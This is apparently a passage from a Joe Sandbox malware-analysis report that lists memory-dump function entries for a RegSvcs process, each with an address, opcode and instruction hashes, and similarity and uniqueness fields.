                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                          • Instruction ID: 77cb9557e29acf0f78d80eb676ea91329ae0dd769a9572a26443127f586689e2
                                                          • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                          • Instruction Fuzzy Hash: 3D01D232600105AFE7219F5AC880FDB7BA9EBD4750F05802BEA05AB370E775DD40D7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0142A250 Relevance: .1, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                          • Instruction ID: 246188c432b674d23361a50dffc7b310dead56275d577b21a919fb5fec62461d
                                                          • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                          • Instruction Fuzzy Hash: 3A0126714047329BCB318F19D840A337BA5EF56760760892EFC958BBA1C331D441CB70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01504940 Relevance: .1, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 996b2ffb851d4018aa7e4abcfe5c4078b50068c05c8d2ead026ade177085eda0
                                                          • Instruction ID: a42a0c35d316f5cfca16f2aed196a65bddab7eeb54f4d7199d0d119b38cdaeb5
                                                          • Opcode Fuzzy Hash: 996b2ffb851d4018aa7e4abcfe5c4078b50068c05c8d2ead026ade177085eda0
                                                          • Instruction Fuzzy Hash: 52010432441511ABC333DF5C9800E16B7A8FB91770B164A39EA689F1E2D730D801C7C0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00417D70 Relevance: .1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5f42d5afca1437b1dae975d7cda31fc4e8fa88c247d6f9692a2fec06420cda84
                                                          • Instruction ID: 0a004670e6cf3e8e66e2c5bef90fed4f99e6b0c7c30bbe04d65af69e259971f9
                                                          • Opcode Fuzzy Hash: 5f42d5afca1437b1dae975d7cda31fc4e8fa88c247d6f9692a2fec06420cda84
                                                          • Instruction Fuzzy Hash: 06F005735490044EE15149B56D410F1BB7AD6DF330714239EE054D3302C3094083C769
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014AE1D0 Relevance: .1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bb9d80fc2123f9102914ead38e093563bd2f6b79ef8c356c2b28a9e3c6750b4c
                                                          • Instruction ID: 83f300aa374c68d5e0a119978e0b43216c82af1df5e60826f3f3f0e74fb46722
                                                          • Opcode Fuzzy Hash: bb9d80fc2123f9102914ead38e093563bd2f6b79ef8c356c2b28a9e3c6750b4c
                                                          • Instruction Fuzzy Hash: 7611A132241241EFDB15EF1ACD90F567BB8FF68B54F10006AED059B6A1C235ED01CA90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01436259 Relevance: .1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 774a83ff51ad293eb37b8a4a1acbade9bd8d5e44fcae6ddcc24051afafb2a18d
                                                          • Instruction ID: 647cd0b9172843993bf84946f02bd99e4edb1d9509f9c723bb9255c13f091d66
                                                          • Opcode Fuzzy Hash: 774a83ff51ad293eb37b8a4a1acbade9bd8d5e44fcae6ddcc24051afafb2a18d
                                                          • Instruction Fuzzy Hash: F2115A71541229ABEB35AF65CC42FE9B278FB58710F50419AA318A61F0DB709E81CF84
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014B6050 Relevance: .0, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5a6ecc479c142d20689e1a378fdd5e44e90ae543ee25d17f109ed853ef653d08
                                                          • Instruction ID: 8143c088f1dbdc6cd780b25e5855592483e119a9b8b63f3d4eb5b7b6c9b7a987
                                                          • Opcode Fuzzy Hash: 5a6ecc479c142d20689e1a378fdd5e44e90ae543ee25d17f109ed853ef653d08
                                                          • Instruction Fuzzy Hash: CA112DB3900119ABCB21DB95CC84DDF777CEF58254F054166E906E7211EA34EA15CBE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0143208A Relevance: .0, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                          • Instruction ID: 057205ae39e380ef8e377e4a12d9fa91e1fa3c6d72190307a8bc94bd47c039ad
                                                          • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                          • Instruction Fuzzy Hash: 3A01F5726001119BEF12AE59D880E57B776BFD8610F1540ABEE118F366DAB1C885C390
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014C6500 Relevance: .0, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6a1e8079e1721be8636eb3000b93a1da146782bcac66d3036eddfb5b8b6f7601
                                                          • Instruction ID: e1845b345131a520286b0ce49e31a0badfbb719584ff747ad534c9baf00a9469
                                                          • Opcode Fuzzy Hash: 6a1e8079e1721be8636eb3000b93a1da146782bcac66d3036eddfb5b8b6f7601
                                                          • Instruction Fuzzy Hash: 9F11E5366401459FD711CF58D400BA2B7B5FB6A714F19C15AE8488F325D732EC41CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014BC810 Relevance: .0, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2aeb957284a58f7bc42a58578e01e440ec649d8264778306256fc6869945c1b9
                                                          • Instruction ID: e999094f50bf8c90267e1c1cb510f410e6940ef802b4acd5dd5a465c5c1aa26a
                                                          • Opcode Fuzzy Hash: 2aeb957284a58f7bc42a58578e01e440ec649d8264778306256fc6869945c1b9
                                                          • Instruction Fuzzy Hash: 511118B1A002099FCB00DFAAD581AAEBBF8FF58350F10406BE905E7351D674EA018BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014DEA60 Relevance: .0, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3aa038032eb8b0208c260cf46744beb71ff469729d64bbb643bdad28a40e308b
                                                          • Instruction ID: 2c207ef936d74f8087e8f1ada9829299aeb27833b8c794bc610ef8eac1209048
                                                          • Opcode Fuzzy Hash: 3aa038032eb8b0208c260cf46744beb71ff469729d64bbb643bdad28a40e308b
                                                          • Instruction Fuzzy Hash: 91019E321402229BDF32AA1A8450D27BBA9FFA2650B45482FE6456F361CA70DC42CBD2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0142C020 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                          • Instruction ID: 80cb79a7d15999fd72e3332964124652c8dda61f424ca5c51d983238a8e6de8b
                                                          • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                          • Instruction Fuzzy Hash: 88016D325007059FEB22E6AAC440E6B77E9FFD1240F00441FE9468B660DE74E442C760
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014720F0 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0768df7b1c748f92cad193c857848ff6bd7f5b8e7c36fa3cc65bae09b38a0ff3
                                                          • Instruction ID: d96a101c11aa0b26be69df53a70bcfe543697569fbd6399dfdc2a3b99f5bc91a
                                                          • Opcode Fuzzy Hash: 0768df7b1c748f92cad193c857848ff6bd7f5b8e7c36fa3cc65bae09b38a0ff3
                                                          • Instruction Fuzzy Hash: 02116D75A0020DEFDB15DF65D850EAE7BB5FB54740F10405AE9019B260D635AE11CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0146E5CF Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: debd6f8b624422fb2ad065d25e40674a90a7272b8a79624ddb74cbe243994691
                                                          • Instruction ID: 85a8eb48ce53f3087674010d0f18340c8a9d6169548c77e2cf20fbf17031f514
                                                          • Opcode Fuzzy Hash: debd6f8b624422fb2ad065d25e40674a90a7272b8a79624ddb74cbe243994691
                                                          • Instruction Fuzzy Hash: 2F018472201521BBE311BB6ACD84E57BBECFB65654700052BB50597671DB74EC01C6E4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014C69C0 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 89977852ba5dca668d29f3a6667601acad35a33a6bfd2f0a1971a5a21bee5f1a
                                                          • Instruction ID: 6a2d4edeb7183ebc8be3029373aac9848737d7768e8e30a507a62d80173cec79
                                                          • Opcode Fuzzy Hash: 89977852ba5dca668d29f3a6667601acad35a33a6bfd2f0a1971a5a21bee5f1a
                                                          • Instruction Fuzzy Hash: 57012836214202DBD320DF6E98489B7BBA8EF55A60F12812EE959873A0E7319902C7D1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014BC460 Relevance: .0, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1074c0af860e7f5fad0f5984e7e1d1987b324a5c66bd521b120a5b6f3663a246
                                                          • Instruction ID: 2c4d09be67508e37dfda5a045755826801e8ec9e5d94c43ecbd741135cfde9d0
                                                          • Opcode Fuzzy Hash: 1074c0af860e7f5fad0f5984e7e1d1987b324a5c66bd521b120a5b6f3663a246
                                                          • Instruction Fuzzy Hash: 8E115E71A00209EBDB15DF65C8C0EEE7BB5EB58340F00406AF90197360DA38DE11DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014BC97C Relevance: .0, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2835a78d78d8b5d880e9e662f3fb0aa7ea0da7754c2be8d46d6d003ea662a777
                                                          • Instruction ID: 8d50e668af67a8f3efb0c29f3e202e6ff8d575586124fe5371fd584e504f5697
                                                          • Opcode Fuzzy Hash: 2835a78d78d8b5d880e9e662f3fb0aa7ea0da7754c2be8d46d6d003ea662a777
                                                          • Instruction Fuzzy Hash: 77112AB16143459FD710DF69D48199BBBE4AFA9710F00491FB998D7361D630E901CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014BCA11 Relevance: .0, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7a8c740b3a1027d7c356fec5738e55b2c4ec0e04c87cf54a1205f39becc6827d
                                                          • Instruction ID: 885f8103efe84d7daf329d6baea205b777582304851f3909c5d8a0ff782290b5
                                                          • Opcode Fuzzy Hash: 7a8c740b3a1027d7c356fec5738e55b2c4ec0e04c87cf54a1205f39becc6827d
                                                          • Instruction Fuzzy Hash: 41112AB16143059FC710DF69D481A9BBBE4BF99750F00451FB958D7364E630E9018BA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0144E016 Relevance: .0, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                          • Instruction ID: de9adb6360ac7564c0a610e08858d721cf78c3c561b8fbce69cd5974dbf95a5f
                                                          • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                          • Instruction Fuzzy Hash: B1015AB22009909FE322961DC948F3B7BE8FB89754F0904A6E915DBAB2D638DC41C621
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0142826B Relevance: .0, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5c98ca745f16230dca7941699333ebb946c7611e2813f2b27451914eeb8be1d2
                                                          • Instruction ID: 30d719ee19ca9a1ea1084520573514efd869430632667f467ebd8da166fcfd57
                                                          • Opcode Fuzzy Hash: 5c98ca745f16230dca7941699333ebb946c7611e2813f2b27451914eeb8be1d2
                                                          • Instruction Fuzzy Hash: BB01F732700516DFD714EB6AE850AAF77E8FFA2610B55402BD902AB7A0EE30DD41C6B0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014DEB50 Relevance: .0, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: ab79a0c0b7e34a2ee6e9a8f9eec5b8310d2660dd804b57aea749761f2ea1ec83
                                                          • Instruction ID: 5afe849f99ce634defb3768941dedbf3ee3f36cb6835ccd9932aa9168a57e787
                                                          • Opcode Fuzzy Hash: ab79a0c0b7e34a2ee6e9a8f9eec5b8310d2660dd804b57aea749761f2ea1ec83
                                                          • Instruction Fuzzy Hash: 3801F7722407119FE7319F16D800F12BAA8EF65B50F05082FF6159F3A0C6F0A8418B94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01432582 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: aa0f7a7376435b96b0f71e23cb3505bb4080e0238e698254fad54058df4119ac
                                                          • Instruction ID: d9bf2382b2fe5543a5e0249f06e1f72ade884e614f3098e1f533e009686fee63
                                                          • Opcode Fuzzy Hash: aa0f7a7376435b96b0f71e23cb3505bb4080e0238e698254fad54058df4119ac
                                                          • Instruction Fuzzy Hash: ACF0F932641620B7C7319F5B8C40F577AE9EBD8AA0F10402AA605976A0D670ED01C6A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0145C073 Relevance: .0, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                          • Instruction ID: ac0d05eef67b2f420416e9616a906d0c29118a9d908684c62004742f52017174
                                                          • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                          • Instruction Fuzzy Hash: D5F0AFF2600611ABE324CF8ED840E57FBEEDBD1A90F048129A905CB320EA31DD04CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0150634F Relevance: .0, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0751c1d2071e1b5a635e622199f302967a7bd821893ca1b049781181729230de
                                                          • Instruction ID: f68166d3f3480e3ff181cc693143db5f203e9b1abe7363226e5707c3f8674bc0
                                                          • Opcode Fuzzy Hash: 0751c1d2071e1b5a635e622199f302967a7bd821893ca1b049781181729230de
                                                          • Instruction Fuzzy Hash: FF018FB1A10209EFDB00DFAAD441AEEB7F8FF58300F10402AF900EB390D6349A019BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0142C310 Relevance: .0, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                          • Instruction ID: 03a75d1eec6e3c0487c6e3e895d88ba70ab1d0551f359d3b9abab0234e7eed06
                                                          • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                          • Instruction Fuzzy Hash: 8EF0FC732446339BD7321B9A48C0B6FA5958FE5AE4F5A043BE2099B260CA748D4256D0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0150625D Relevance: .0, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 041df909fef301996affcab612ac321e1a09b6d05f02005f86be28d7439e263c
                                                          • Instruction ID: ba5916a9d3e965000d47813287817f301ede52a6d94cd8dbda2eff9df8c84593
                                                          • Opcode Fuzzy Hash: 041df909fef301996affcab612ac321e1a09b6d05f02005f86be28d7439e263c
                                                          • Instruction Fuzzy Hash: 73018471A0020AEFDB04DFA9D4419AEB7F8FF58300F10401AF900EB391D6749901CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 015062D6 Relevance: .0, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f88a220e2a500de36f13a8117000133f20f4f212174c9d6ad39cf6a7288730a4
                                                          • Instruction ID: d3d55663245ff5c6a498c381dc30203df26f3c7b5834923af43b40defb5861ab
                                                          • Opcode Fuzzy Hash: f88a220e2a500de36f13a8117000133f20f4f212174c9d6ad39cf6a7288730a4
                                                          • Instruction Fuzzy Hash: 580144B1A0020AEFDB04DFA9D4419EEB7F8FF58704F50405AF914EB390D6749D018BA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0146CA6F Relevance: .0, Instructions: 42COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                          • Instruction ID: 2788b5c910a936c17b37bd88ae46e11bf69b28b55903a908613e83a244cce6e6
                                                          • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                          • Instruction Fuzzy Hash: 2E01F4322006869BE322D75DC845F5ABB9CEF61755F0940BBFA848B7B1E678C802C211
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 015061E5 Relevance: .0, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e3bfe2dcd320edbaa0f1b59d63d2396303199702767c58b73e408849835b93b4
                                                          • Instruction ID: 1aec354da64968dc9f98cf5db8cd07192ce0c5451e96f69abf4214cbb1c9d2dc
                                                          • Opcode Fuzzy Hash: e3bfe2dcd320edbaa0f1b59d63d2396303199702767c58b73e408849835b93b4
                                                          • Instruction Fuzzy Hash: DE018F71A00259DFDB10DFA9D841AEEBBF8BF58310F14005AE500AB290D774EA01CB95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014B63C0 Relevance: .0, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                          • Instruction ID: a618a895df1b5be7a53c7268402acc3362c3faf41f52bec98243a93752099624
                                                          • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                          • Instruction Fuzzy Hash: 98F01D7220001DBFEF019F95DD80DEF7B7EEB69698B114129FA1192170D635DD21ABA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014BA4B0 Relevance: .0, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 322668f9b4c5c6fb762228bbc4a2df8a0204a862b49dbe13d430a693b308533e
